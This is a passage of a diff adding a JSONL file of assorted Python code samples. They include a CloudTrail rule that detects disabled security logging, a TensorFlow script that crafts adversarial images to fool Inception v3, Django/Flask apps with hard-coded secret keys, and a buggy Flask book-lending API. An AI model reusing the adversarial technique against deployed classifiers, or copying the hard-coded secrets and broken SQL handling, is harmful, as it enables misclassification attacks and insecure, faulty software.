diff --git "a/4130.jsonl" "b/4130.jsonl" new file mode 100644--- /dev/null +++ "b/4130.jsonl" @@ -0,0 +1,770 @@ +{"seq_id":"456189523","text":"import random\n\ndef e(num):\n\n sum = 0\n for x in range(0, num):\n current = 0.0\n while current < 1:\n current += random.random()\n sum += 1\n\n return sum / num\n\nprint(e(1000000)) #as num increases, answer gets closer to e\n","sub_path":"python/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"437264687","text":"SECURITY_CONFIG_ACTIONS = {\n 'DeleteAccountPublicAccessBlock',\n 'DeleteDeliveryChannel',\n 'DeleteDetector',\n 'DeleteFlowLogs',\n 'DeleteRule',\n 'DeleteTrail',\n 'DisableEbsEncryptionByDefault',\n 'DisableRule',\n 'StopConfigurationRecorder',\n 'StopLogging',\n}\n\n\ndef rule(event):\n if event['eventName'] == 'UpdateDetector':\n return not event['requestParameters'].get('enable', True)\n\n return event['eventName'] in SECURITY_CONFIG_ACTIONS\n\n\ndef title(event):\n user = event['userIdentity'].get('userName') or event['userIdentity'].get(\n 'sessionContext').get('sessionIssuer').get('userName')\n\n return f\"Sensitive AWS API call {event['eventName']} made by {user}\"\n","sub_path":"aws_cloudtrail_rules/aws_security_configuration_change.py","file_name":"aws_security_configuration_change.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645219315","text":"class Solution:\n def isValidSudoku(self, board) -> bool:\n if self.column_has_repeat(board):\n return False\n if self.row_has_repeat(board):\n return False\n if self.sudoku9_has_repeat(board):\n return False\n return True\n\n @staticmethod\n def has_repeat_number(array: list):\n newList = list(filter(lambda item: item != '.', array))\n return len(set(newList)) != len(newList)\n\n def row_has_repeat(self, board):\n # 遍历行\n for item in board:\n if self.has_repeat_number(item):\n return True\n return False\n\n def column_has_repeat(self, board):\n # 遍历列\n x = 0\n while x < 9:\n temp = []\n y = 0\n while y < 9:\n temp.append(board[y][x])\n y += 1\n if self.has_repeat_number(temp):\n return True\n x += 1\n temp.clear()\n return False\n\n def sudoku9_has_repeat(self, board):\n # 遍历3x3格\n x = 0\n y = 0\n startY = y\n temp = []\n while y < 9:\n temp.extend(board[y][x:x + 3])\n temp.extend(board[y + 1][x:x + 3])\n temp.extend(board[y + 2][x:x + 3])\n x += 3\n\n if self.has_repeat_number(temp):\n return True\n temp.clear()\n if x == 9:\n x = 0\n startY += 3\n\n y = startY\n return False\n\n\ns = Solution()\nres = s.isValidSudoku([[\"5\", \"3\", \".\", \".\", \"7\", \".\", \".\", \".\", \".\"],\n [\"6\", \".\", \".\", \"1\", \"9\", \"5\", \".\", \".\", \".\"],\n [\".\", \"9\", \"8\", \".\", \".\", \".\", \".\", \"6\", \".\"],\n [\"8\", \".\", \".\", \".\", \"6\", \".\", \".\", \".\", \"3\"],\n [\"4\", \".\", \".\", \"8\", \".\", \"3\", \".\", \".\", \"1\"],\n [\"7\", \".\", \".\", \".\", \"2\", \".\", \".\", \".\", \"6\"],\n [\".\", \"6\", \".\", \".\", \".\", \".\", \"2\", \"8\", \".\"],\n [\".\", \".\", \".\", \"4\", \"1\", \"9\", \".\", \".\", \"5\"],\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \"7\", \"9\"]]\n )\nprint(res)\n","sub_path":"leetcode/array/30.py","file_name":"30.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"114599099","text":"###################################################\n# Author: Liu Aishan #\n# Date: 2018.3.26 #\n# Create adversarial examples under #\n# different image transformation distributions #\n###################################################\n\n\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport tensorflow.contrib.slim.nets as nets\nimport PIL\nimport numpy as np\nimport os\nimport tarfile\nimport matplotlib.pyplot as plt\nimport json\n\n\nsess = tf.InteractiveSession()\n\nimage = tf.Variable(tf.zeros((299, 299, 3)))\n\nlog_dir = 'inception_v3_log'\nif not os.path.exists(log_dir):\n\tos.makedirs(log_dir)\n\n# inception_v3 model\ndef inception(image, reuse=False):\n\tpreprocessed = tf.multiply(tf.subtract(tf.expand_dims(image, 0), 0.5), 2.0)\n\targ_scope = nets.inception.inception_v3_arg_scope(weight_decay=0.0)\n\twith slim.arg_scope(arg_scope):\n\t\tlogits,_ = \tnets.inception.inception_v3(preprocessed, 1001, is_training=False, reuse=reuse)\n\t\tlogits = logits[:, 1:]\n\t\tprobs = tf.nn.softmax(logits)\n\treturn logits, probs\n\nlogits, probs = inception(image)\n\ndata_dir = '../data'\nimg_path = os.path.join(data_dir, 'girl.jpeg')\n\nrestore_vars =[ var for var in tf.global_variables() if var.name.startswith('InceptionV3/')]\nsaver = tf.train.Saver(restore_vars)\nsaver.restore(sess, os.path.join(data_dir,'inception_v3.ckpt'))\n\nimagenet_json = os.path.join(data_dir,\"imagenet.json\")\nwith open(imagenet_json) as f:\n\timagenet_labels = json.load(f)\n\n# classify a image into its class and show result\ndef classify(img, correct_class=None, target_class=None):\n\tfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 8))\n\tfig.sca(ax1)\n\tp = sess.run(probs, feed_dict={image: img})[0]\n\tax1.imshow(img)\n\tfig.sca(ax1)\n\n\ttopk = list(p.argsort())[-10:][::-1]\n\ttopprobs = p[topk]\n\tbarlist = ax2.bar(range(10), topprobs)\n\tif target_class in topk:\n\t\tbarlist[topk.index(target_class)].set_color('r')\n\tif correct_class in topk:\n\t\tbarlist[topk.index(correct_class)].set_color('g')\n\tplt.sca(ax2)\n\tplt.ylim([0, 1.1])\n\tplt.xticks(range(10), [imagenet_labels[i][:15] for i in topk],\n\t\t\t\trotation='vertical')\n\tfig.subplots_adjust(bottom=0.2)\n\tplt.show()\n\ndata_dir = '../data'\nimg_path = os.path.join(data_dir, 'girl.jpeg')\n# image preprocessing\n# PIL seems have sth wrong with TF when add tf.image.adjust_brightness()\nimg_class = 281\nimg = PIL.Image.open(img_path)\n#img.width = img.size[0]\n#img.height = img.size[1]\nbig_dim = max(img.width, img.height)\nwide = img.width > img.height\nnew_w = 299 if not wide else int(img.width * 299 / img.height)\nnew_h = 299 if wide else int(img.height * 299 / img.width)\nimg = img.resize((new_w, new_h)).crop((0, 0, 299, 299))\nimg = (np.asarray(img) / 255.0).astype(np.float32)\n\n#classify(img, correct_class=img_class)\n\n\nx = tf.placeholder(tf.float32, (299, 299, 3))\n\n# trainable image to get adversarial example\nx_hat = image\nassign_op = tf.assign(x_hat, x)\n\nlearning_rate = tf.placeholder(tf.float32, ())\ny_hat = tf.placeholder(tf.int32, ())\n\nlabels = tf.one_hot(y_hat, 1000)\n\n# get a adversarial example under different image transformation distributions\n\nnum_samples = 4 # samples number needed to be increased when GPU is available\naverage_loss = 0\n\n\nfor i in range(num_samples):\n\tnoise_img = tf.add(image, tf.clip_by_value(tf.random_normal(shape=image.get_shape(), mean=0, stddev=1), 0, 0.25))\n\tnoise_img = tf.clip_by_value(noise_img, 0, 1)\n\tnoise_logits, _ = inception(noise_img, reuse = True)\n\taverage_loss += tf.nn.softmax_cross_entropy_with_logits(logits=noise_logits, labels = labels) / num_samples\n\n# optimizer\noptim_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(average_loss, var_list=[x_hat])\n\nepsilon = tf.placeholder(tf.float32, ())\n\n# clip need to be done to make sure noise 'imperceptible' to human eyes\nbelow = x - epsilon\nabove = x + epsilon\nprojected = tf.clip_by_value(tf.clip_by_value(x_hat, below, above), 0, 1)\nwith tf.control_dependencies([projected]):\n project_step = tf.assign(x_hat, projected)\n\n# training process\ndemo_epsilon2 = 8.0/255.0\ndemo_lr2 = 2e-1\ndemo_steps2 = 100 # need more than 100 steps\ndemo_target2 = 924\n\nsess.run(assign_op, feed_dict={x:img})\n\nfor i in range(demo_steps2):\n\t_, loss_value = sess.run([optim_step, average_loss], feed_dict={learning_rate: demo_lr2, y_hat: demo_target2})\n\n\tsess.run(project_step, feed_dict={x: img, epsilon: demo_epsilon2})\n\tif (i+1) % 10 == 0 :\n\t\tprint(\" step %d, loss %g\" %(i+1, loss_value))\n\nadv_robust = x_hat.eval()\n\nfor i in range(0, 10):\n\tnoise_image = tf.add(image, tf.clip_by_value(tf.random_normal(shape=image.get_shape(), mean=0, stddev=1), 0, 0.25))\n\tnoise_image = tf.clip_by_value(noise_image, 0, 1)\n\tnoise_ex = noise_image.eval(feed_dict={image: adv_robust})\n\tclassify(noise_ex, correct_class=img_class, target_class=924)\n","sub_path":"src/testNoise.py","file_name":"testNoise.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569801846","text":"# -*- coding: utf-8 -*-\n\nSOCKET_URL = (\n (0, '富豪服务器'),\n (1, '三消服务器'),\n (9999, '其他服务器'),\n)\n\nSANXIAO_SOCKET_URL_TEST = 'http://192.168.20.140:8000/'\nSANXIAO_SOCKET_URL_FZ = 'https://xyxsxfz.nalrer.cn/'\nSANXIAO_SOCKET_URL_ONLINE = 'https://xyxsx.nalrer.cn/'\n\nFUHAO_SOCKET_URL_TEST = 'http://192.168.20.108:8000/'\nFUHAO_SOCKET_URL_FZ = 'https://fz.nalrer.cn/'\nFUHAO_SOCKET_URL_ONLINE = 'https://openrich.nalrer.cn/'\n\n\ndef getSocketUrl(id):\n if id == 0:\n return FUHAO_SOCKET_URL_ONLINE\n elif id == 1:\n return SANXIAO_SOCKET_URL_ONLINE\n else:\n return ''\n\n\ndef gain_SetSocketApi(id):\n if id == 0:\n return 'v3/game/zmgm/set'\n elif id == 1:\n return 'api/wx/zmgm/set'\n else:\n return ''\n\ndef gain_GetSocketApi(id):\n if id == 0:\n return 'v3/game/zmgm/get'\n elif id == 1:\n return 'api/wx/zmgm/get'\n else:\n return ''\n\n\nfrom django.contrib import messages\n\n\ndef flash(request, title, text, level='info'):\n \"\"\"\n 利用django的message系统发送一个信息。\n \"\"\"\n level_map = {\n 'info': messages.INFO,\n 'debug': messages.DEBUG,\n 'success': messages.SUCCESS,\n 'warning': messages.WARNING,\n 'error': messages.ERROR\n }\n\n level = level_map[level]\n\n messages.add_message(request, level, text, extra_tags=title)\n return 'ok'\n\nimport time\n\ndef timeStampToStr(ts, formatTime = \"%Y-%m-%d %H:%M:%S\"):\n t = time.localtime(ts)\n return time.strftime(formatTime, t)","sub_path":"common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"287006192","text":"cards = input().split()\nn_shuffles = int(input())\n\ntop_card = cards[0]\nbottom_card = cards[-1]\n\nhalf = len(cards) // 2\n\nleft_cards = []\nright_cards = []\n\nshuffle_cards = []\n\nfor n_shuffles in range(n_shuffles):\n for index in range(1, half):\n left_cards.append(cards[index])\n\n for index in range(half, len(cards) - 1):\n right_cards.append(cards[index])\n\n for index in range(len(left_cards)):\n shuffle_cards.append(right_cards[index])\n shuffle_cards.append(left_cards[index])\n\n cards = shuffle_cards.copy()\n cards.append(bottom_card)\n cards.insert(0, top_card)\n shuffle_cards = []\n left_cards = []\n right_cards = []\n\nprint(cards)","sub_path":"3_lists_basics/5_faro_.shuffle.py","file_name":"5_faro_.shuffle.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69202831","text":"from django.core.context_processors import csrf\nfrom django.shortcuts import redirect, render_to_response\nfrom page.forms import PagedownModelForm\nfrom site_list.models import MarkdownSite\nfrom page.models import MarkdownPage\nfrom django.http.response import Http404\nfrom django.contrib import auth\nfrom django.utils.timezone import now\n\ndef editPage(request, site_url, page_url):\n args = {}\n args.update(csrf(request))\n args.update({'request':request, 'username': auth.get_user(request).username,\n 'form': PagedownModelForm,'site': MarkdownSite.objects.get(url = site_url),\n 'page': MarkdownPage.objects.get(url = page_url)})\n check_for_http404(request, site_url)\n if request.POST:\n execute_editing(request, page_url)\n return redirect('/sites/'+site_url+'/'+page_url)\n else:\n return render_to_response('page_editor.html', args)\n\ndef execute_editing(request, page_url):\n page_content = request.POST.get('markdown_edit_field', '')\n if page_content==\"\": page_content = \" \"\n page = MarkdownPage.objects.get(url = page_url)\n edit_page(page, page_content)\n\ndef check_for_http404(request, site_url):\n if auth.get_user(request) != MarkdownSite.objects.get(url = site_url).user:\n raise Http404\n\ndef edit_page(page, page_content):\n page.content = page_content\n page.last_edit_time = now()\n page.save()","sub_path":"page_editor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116582344","text":"LOGTAIL_FILES = {\n 'noexist': '/foo/bar',\n 'test': 'test.log',\n}\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'example.db',\n }\n}\nSITE_ID = 1\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nSTATIC_ROOT = ''\nSTATIC_URL = '/static/'\n\nSECRET_KEY = ')@g^2o!ojviexmcsbr%pfctj!2fx-v7=c*rn$7(*k%y8u!!)o0'\nROOT_URLCONF = 'example.urls'\nWSGI_APPLICATION = 'example.wsgi.application'\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'django_logtail',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","sub_path":"example/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"630818098","text":"import os\nimport sys\nimport pygame\n\npygame.init()\nsize = width, height = 500, 500\nscreen = pygame.display.set_mode(size)\nall_sprites = pygame.sprite.Group()\nsprite = pygame.sprite.Sprite()\npygame.mouse.set_visible(False)\n\n\ndef load_image(name, colorkey=None):\n fullname = os.path.join('data', name)\n if not os.path.isfile(fullname):\n print(f\"Файл с изображением '{fullname}' не найден\")\n sys.exit()\n image = pygame.image.load(fullname)\n if colorkey is not None:\n image = image.convert()\n if colorkey == -1:\n colorkey = image.get_at((0, 0))\n image.set_colorkey(colorkey)\n else:\n image = image.convert_alpha()\n return image\n\nsprite.image = load_image(\"arrow.png\")\nsprite.rect = sprite.image.get_rect()\nall_sprites.add(sprite)\nclock = pygame.time.Clock()\ntickrate = 60\nrunning = True\nwhile running:\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n running = False\n if pygame.mouse.get_focused():\n pos = pygame.mouse.get_pos()\n sprite.rect.x, sprite.rect.y = pos[0], pos[1]\n screen.fill(\"black\")\n all_sprites.draw(screen)\n pygame.display.flip()\n clock.tick(tickrate)","sub_path":"te.py","file_name":"te.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"137254236","text":"# coding=utf-8\nfrom flask import Flask, render_template, url_for, request, redirect, g, session, make_response, jsonify\nfrom model import User, Book, Identifier, NcuOS\nimport sqlite3, requests, json\nfrom functools import wraps\nfrom flask_cors import CORS\nfrom werkzeug.security import generate_password_hash\n\napp = Flask(__name__)\napp.config[\"DATABASE\"] = 'database.db'\napp.config[\"SECRET_KEY\"] = 'I am NCU homer.'\napp.config['JSON_AS_ASCII'] = False\n\n# CORS(app, support_credentials=True)\n\n\ndef connect_db():\n db = sqlite3.connect(app.config[\"DATABASE\"])\n return db\n\ndef init_db():\n with app.app_context():\n db = connect_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\ndef insert_user_to_db(user):\n sql_insert = 'INSERT INTO users (username, student_id, password, status) values (?, ?, ?, ?)'\n args = [user.username, user.student_id, user.password, user.status]\n g.db.execute(sql_insert, args)\n g.db.commit()\n\ndef insert_student_id_to_db(student_id):\n sql_insert = 'INSERT INTO identifiers (student_id) values (?)'\n args = [student_id]\n g.db.execute(sql_insert, args)\n g.db.commit()\n\ndef insert_book_to_db(book):\n sql_insert = 'INSERT INTO books (book_name, author, owner, status, price, lend_time, period, image) values (?, ?, ?, ?, ?, ?, ?)'\n args = [book.book_name, book.author, book.owner, book.status, book.price, book.lend_time, book.period, book.image]\n g.db.execute(sql_insert, args)\n g.db.commit()\n\ndef update_user_status(user):\n sql_update = \"UPDATE users SET status = '1' WHERE student_id=?\"\n args = [user.student_id]\n g.db.execute(sql_update, args)\n g.db.commit()\n\ndef query_users_by_username(username):\n sql_select = 'SELECT * FROM users WHERE username=?'\n args = [username]\n cur = g.db.execute(sql_select, args)\n items = cur.fetchall()\n if len(items) < 1:\n return None\n first_item = items[0]\n query_username = User()\n query_username.username = first_item[1]\n return query_username\n\ndef query_users_by_student_id(student_id):\n sql_select = 'SELECT * FROM users WHERE student_id=?'\n args = [student_id]\n cur = g.db.execute(sql_select, args)\n items = cur.fetchall()\n if len(items) < 1:\n return None\n first_item = items[0]\n query_student_id = User()\n query_student_id.username = first_item[1]\n query_student_id.student_id = first_item[2]\n query_student_id.student_id = first_item[3]\n query_student_id.status = first_item[4]\n query_student_id.address = first_item[6]\n return query_student_id\n\ndef query_books(data):\n if data == '':\n sql_select = 'SELECT * FROM books'\n cur = g.db.execute(sql_select)\n items = cur.fetchall()\n if len(items) < 1:\n return None\n return items\n else:\n sql_select = 'SELECT * FROM books WHERE (book_name) LIKE values (?)'\n args = '%' + data + '%'\n cur = g.db.execute(sql_select, args)\n items = cur.fetchall()\n if len(items) < 1:\n return None\n return items\n\ndef query_identify(student_id):\n sql_select = 'SELECT * FROM identifiers WHERE student_id=?'\n args = [student_id]\n cur = g.db.execute(sql_select, args)\n items = cur.fetchall()\n if len(items) < 1:\n return None\n first_item = items[0]\n query_student_id = Identifier()\n query_student_id.student_id = first_item[1]\n return query_student_id\n\ndef check_password(self, password):\n from werkzeug.security import check_password_hash\n return check_password_hash(self.password, password)\n\ndef identify_by_ncu_os(ncu_os):\n url_token = 'https://os.ncuos.com/api/user/token'\n headers_token = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36\",\n \"content-type\": \"application/json\"\n }\n payload = {\n \"username\": ncu_os.username,\n \"password\": ncu_os.password\n }\n try:\n res_token = requests.post(url_token, headers=headers_token, data=json.dumps(payload))\n token = 'passport ' + json.loads(res_token.text)['token']\n url_profile = 'https://os.ncuos.com/api/user/profile/basic'\n headers_profile = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36\",\n \"content-type\": \"application/json\",\n \"authorization\": token\n }\n res_profile = requests.get(url_profile, headers=headers_profile)\n profile = json.loads(res_profile.text)['base_info']['xh']\n return profile\n except:\n profile = '0'\n return profile\n\ndef sign_in_check(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if \"student_id\" not in session:\n data = {\n 'status': '0',\n 'message': '未登录'\n }\n res = make_response(jsonify(data))\n res.headers['Access-Control-Allow-Credentials'] = 'true'\n res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n return f(*args, **kwargs)\n return decorated_function\n\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n@app.teardown_request\ndef teardown_request(self):\n if hasattr(g, 'db'):\n g.db.close()\n\n#@app.after_request\n#def after_request(response):\n # ip = request.remote_addr\n # response.headers.add('Access-Control-Allow-Origin', 'http://' + ip)\n # response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')\n #response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')\n # response.headers.add('Access-Control-Allow-Credentials', 'true')\n # return response\n\n@app.route('/')\ndef index():\n return '

Hello BF

'\n\n@app.route('/sign_up/', methods=['GET', 'POST', 'OPTIONS'])\ndef sign_up():\n if request.method == \"OPTIONS\":\n return 200\n if request.method == \"POST\":\n print(request.get_json())\n query_username = query_users_by_username(request.get_json()['username'])\n if query_username:\n data = {\n 'status': '0',\n 'message': '用户名已存在'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res, 200\n query_student_id = query_users_by_student_id(request.get_json()['student_id'])\n if query_student_id:\n data = {\n 'status': '0',\n 'message': '学号已被注册'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res, 200\n user = User()\n user.username = request.get_json()['username']\n user.student_id = request.get_json()['student_id']\n user.password = generate_password_hash(request.get_json()['password'])\n user.status = '0'\n insert_user_to_db(user)\n data = {\n 'status': '1',\n 'message': '注册成功'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res, 200\n data = {\n 'status': '0',\n 'message': '未注册'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res, 200\n\n@app.route('/identify/', methods=['GET', 'POST','OPTIONS'])\ndef identify():\n if request.method == \"OPTIONS\":\n return 200\n if request.method == \"POST\":\n query_student_id = query_identify(request.get_json()['student_id'])\n if query_student_id:\n data = {\n 'status': '0',\n 'message': '学号已被认证'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n ncu_os = NcuOS()\n ncu_os.username = request.get_json()['student_id']\n ncu_os.password = request.get_json()['password']\n profile = identify_by_ncu_os(ncu_os)\n if str(request.get_json['student_id']) == profile:\n user = User()\n user.student_id = request.get_json()['student_id']\n update_user_status(user)\n insert_student_id_to_db(request.get_json()['student_id'])\n data = {\n 'status': '1',\n 'message': '认证成功'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n else:\n data = {\n 'status': '0',\n 'message': '认证失败'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n data = {\n 'status': '0',\n 'message': '未认证'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n\n@app.route('/sign_in/', methods=['GET', 'POST', 'OPTIONS'])\ndef sign_in():\n if request.method == \"OPTIONS\":\n return 200\n if request.method == \"POST\":\n query_student_id = query_users_by_student_id(request.get_json()['student_id'])\n if not query_student_id:\n data = {\n 'status': '0',\n 'message': '用户不存在'\n }\n res = make_response(jsonify(data))\n res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n else:\n if not query_student_id.check_password(request.get_json()['password']):\n data = {\n 'status': '0',\n 'message': '密码错误'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n elif query_student_id.status == 0:\n data = {\n 'status': '2',\n 'message': '未认证'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n else:\n session['student_id'] = request.get_json()['student_id']\n data = {\n 'status': '1',\n 'message': '密码正确',\n 'session': session[\"student_id\"]\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n data = {\n 'status': '0',\n 'message': '未登录'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n\n@app.route('/logout/')\ndef logout():\n session.pop('student_id', None)\n data = {\n 'status': '1',\n 'message': '已退出登录'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n\n@app.route('/user_zone/', methods=['GET', 'POST', 'OPTIONS'])\n@sign_in_check\ndef user_zone():\n if request.method == \"OPTIONS\":\n return 200\n query_student_id = query_users_by_student_id(session['student_id'])\n data = {\n 'username': query_student_id.username,\n 'student_id': query_student_id.student_id,\n 'address': query_student_id.address,\n 'status': '1',\n 'message': '获取个人资料成功'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n\n@app.route('/glance_book/', methods=['GET', 'POST', 'OPTIONS']) \n@sign_in_check\ndef glance_book():\n if request.method == 'POST':\n return 200\n if request.method == 'GET':\n data = ''\n if request.method == 'POST':\n data = request.get_json()['key']\n books = query_books(data)\n if not books:\n data = {\n 'status': '0',\n 'message': '无'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n data = {\n 'books': books, # book_list\n 'status': '1',\n 'message': '查询成功'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n\n@app.route('/add_book/', methods=['GET', 'POST', 'OPTIONS'])\n@sign_in_check\ndef add_book():\n if request.method == 'OPTIONS':\n return 200\n if request.method == 'POST':\n data = request.get_json()\n book = Book()\n book.book_name = data['book_name']\n book.author = data['author']\n book.owner = session['student_id']\n book.status = '0'\n book.price = data['price']\n book.lend_time = data['lend_time']\n book.period = data['period']\n book.describe = data['describe']\n book.image = 'none'\n try:\n insert_book_to_db(book)\n data = {\n 'book_name': book.book_name,\n 'author': book.author,\n 'status': '1',\n 'message': '上架图书成功'\n }\n res = make_response(jsonify(data))\n #res.headers['Access-Control-Allow-Credentials'] = 'true'\n #res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n except:\n data = {\n 'status': '0',\n 'message': '上架图书失败'\n }\n res = make_response(jsonify(data))\n # res.headers['Access-Control-Allow-Credentials'] = 'true'\n # res.headers['Access-Control-Allow-Origin'] = '[HTTP_ORIGIN]'\n return res\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=9000)\n","sub_path":"venv/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"487530837","text":"import unicodedata\nimport unidecode\nimport string\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef Read_Data(filename):\n\tIN=open(filename,\"r\")\n\tIN.readline()\n\tData_Set=[]\n\twhile True:\n\t\tline=IN.readline()\n\t\tif(not line):\n\t\t\tbreak\n\t\tline_list=list(line)\n\t\tFlag=int(line_list[0])\n\t\tfor i in xrange(2,len(line_list)):\n\t\t\tif(line_list[i]==\",\"):\n\t\t\t\tif(i==2):\n\t\t\t\t\ttimestamp=None\n\t\t\t\telse:\n\t\t\t\t\ttimestamp=line_list[2:(i-1)]\n\t\t\t\tComment=\"\".join(line_list[(i+1):len(line_list)])\n\t\t\t\tbreak\n\t\tif(timestamp):\n\t\t\tYear=\"\".join(timestamp[0:4])\n\t\t\tMonth=\"\".join(timestamp[4:6])\n\t\t\tDay=\"\".join(timestamp[6:8])\n\t\t\tHour=\"\".join(timestamp[8:10])\n\t\t\tMinute=\"\".join(timestamp[10:12])\n\t\t\tSecond=\"\".join(timestamp[12:14])\n\t\telse:\n\t\t\tYear=\"N/A\"\n\t\t\n\t\tData_Row=[Flag,Year,Month,Day,Hour,Minute,Second,Comment]\n\t\tData_Set.append(Data_Row)\n\treturn Data_Set\n\n#Not currently used -- not working.\ndef Unicode_to_ASCII(in_string):\n\t#table = {\n\t#\t' ' : '\\\\xa',\n\t#\t'\\n' : None\n\t#\t}\n\tin_string=unicode(in_string)\n\tout_string=in_string.encode(\"utf-8\")\n\tout_string=in_string.encode('ascii',errors='backslashreplace')\n\t#tbl = string.maketrans('\\\\xa',' ')\n\t#out_string=string.translate(tbl)\n\treturn out_string\n\ndef Naive_Bayes(Train,Dictionary,Class_Count):\n\tN_Words=len(Dictionary)\n\tN_Train=len(Train)\n\tCount=np.zeros([N_Words,3])\n\tfor i in 